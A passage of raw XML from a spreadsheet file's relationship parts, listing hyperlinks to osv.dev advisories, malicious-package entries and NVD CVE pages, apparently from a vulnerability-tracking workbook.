TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId1678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId1679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId1680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId1681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId1682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId1683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId1684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId1685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId1686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId1687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId1689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId1690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId1691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId1692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId1693" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 